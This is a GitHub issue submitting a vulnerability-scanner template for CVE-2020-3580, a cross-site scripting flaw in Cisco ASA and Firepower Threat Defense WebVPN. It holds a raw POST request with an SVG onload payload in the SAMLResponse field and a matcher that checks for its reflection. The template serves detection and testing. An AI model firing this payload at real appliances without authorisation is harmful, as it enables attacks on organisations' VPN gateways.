Skip to content

CVE-2020-3580.yaml #1790

New issue
New issue
Closed
Closed
CVE-2020-3580.yaml#1790
@mikey96

Description

@mikey96
mikey96
opened on Jun 25, 2021

CVE-2020-3580 - https://nvd.nist.gov/vuln/detail/CVE-2020-3580

id: CVE-2020-3580

info:
  name: CVE-2020-3580
  author: Mikey96
  severity: Medium
  description: CVE-2020-3580 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software XSS

requests:
  - raw:
      - |
        POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
        Host: {{Hostname}}
        Cookie: webvpnlogin=1; webvpnLang=en
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
        Accept-Language: en-GB,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 66
        Upgrade-Insecure-Requests: 1
        Te: trailers
        Connection: close

        SAMLResponse=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<svg/onload=alert(document.domain)>'
        part: body

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions